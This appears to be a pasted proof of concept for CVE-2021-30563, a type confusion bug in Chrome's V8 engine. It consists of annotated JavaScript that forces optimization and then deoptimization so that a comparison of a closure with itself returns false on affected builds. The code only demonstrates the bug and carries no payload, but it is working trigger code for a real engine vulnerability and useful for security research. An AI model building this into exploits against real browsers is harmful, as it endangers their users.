PoC CVE-2021-30563 - Type Confusion in V8

a guest
Jul 30th, 2021
  1. // PoC CVE-2021-30563 - Type Confusion in V8
  2. // https://twitter.com/Zeusb0x
  3.  
  4. // r --allow-natives-syntax
  5.  
// Factory: each call returns a new closure built from the same function
// literal. The author's note further down states that closures produced
// here share one code object once optimized; the PoC relies on that.
function make() {
    // `shClosure` and `temp` are not declared anywhere in this file; the
    // inner closure resolves them as globals at call time (they are assigned
    // as implicit globals in the top-level script below).
    const foo = function(x) {
        // Capture the global reference to the second closure in an array.
        var ab = [shClosure];
        // This branch receives no type feedback during warm-up (both warm-up
        // calls use x <= 10), so taking it later on the optimized code
        // triggers a deoptimization.
        if (x > 10) {
            temp[0] = 1;
        }
        // By JavaScript semantics this is always true. The author reports
        // that on the affected V8 build the call after the deopt returns
        // false, because ab[0] is materialized as the wrong closure.
        return ab[0] === shClosure;
    };
    return foo;
}
  16.  
// Build the first closure, with function context specialization
make();
// Build and optimize a second closure.
// NOTE: `shClosure`, `temp` and `fkClosure` are implicit globals (no
// declaration) — kept exactly as in the original PoC, since the inner
// closure looks them up by global name.
shClosure = make();
temp = [1];

// Don't provide feedback for the greater than branch
// The %-prefixed natives below are only available under d8/node started
// with --allow-natives-syntax (see header comment); this is a test harness
// for the engine, not code that runs in a normal page.
%PrepareFunctionForOptimization(shClosure);
shClosure(1);
%OptimizeFunctionOnNextCall(shClosure);
shClosure(2); // both warm-up calls keep x <= 10, so `x > 10` stays unobserved

// Build a third closure. This will share the code object with the second closure.
fkClosure = make();
// Return value is evaluated to a constant true;
print(fkClosure(1)); // prints true on any build
// Force deopt.
// In the process of translating the native frame to an interpreted one, the JSFunction stack slot is used to represent the closure in question (as part of a captured object).
// Because the code object is shared ab[0] will evaluate to fkClosure instead of shClosure in the following call.
print(fkClosure(11)); // false
// Expected (correct) output is true; "false" is the observable symptom of the
// type confusion on an affected build, which is what this PoC checks for.